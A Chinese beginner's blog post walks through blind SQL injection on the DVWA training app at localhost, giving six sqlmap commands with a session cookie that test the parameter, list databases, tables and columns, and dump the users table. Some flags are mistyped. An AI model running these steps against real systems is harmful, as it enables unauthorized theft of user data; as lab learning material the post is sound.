首页 > 代码库 > 我的学习之路(一)SQL盲注学习篇

我的学习之路(一)SQL盲注学习篇

  我的学习之路,现在零基础,是一个小白,请各位大牛批评指正!写下这篇,是对自己的一个思路的整理,仅供参考。

  Dvwa中登录进入,首先在DVWA Security中设置等级为low,然后进入SQL Injection(blind),随意输入一个数字进行抓包,然后找到URL注入点和cookie。(抓包使用的工具为fiddler,在此就不进行详述抓包过程了)

技术分享


然后进入cmd界面进行命令参数输入:

  第一步查询该URL是否可进行注入,命令参数如下:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6"

  -u参数为指定URL   --cookie="cookie值"

技术分享

  结果发现是可以进行注入的。

  第二步查看所有的数据库:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –dbs

技术分享

  第三步查看当前用户:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –current-user

技术分享

  第四步查看数据库dvwa中所有的表:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa --tables

技术分享

  第五步查看数据库中的users表,其中—columns为查看当前表的所有列

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa –T users--columns

技术分享

  各位经过前面的步骤是不是等的没有耐心了,哈哈,但是结果出来,还是有成就感的哦。第六步,也就是最后一步,--dump 将所有列的信息都列出来。

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa –T users--dump

技术分享

  当然,最后一张图没有截成完整图哦,你可以继续回车的!!


本文出自 “学习之旅思路整理” 博客,请务必保留此出处http://pieshusheng.blog.51cto.com/13106113/1946399

我的学习之路(一)SQL盲注学习篇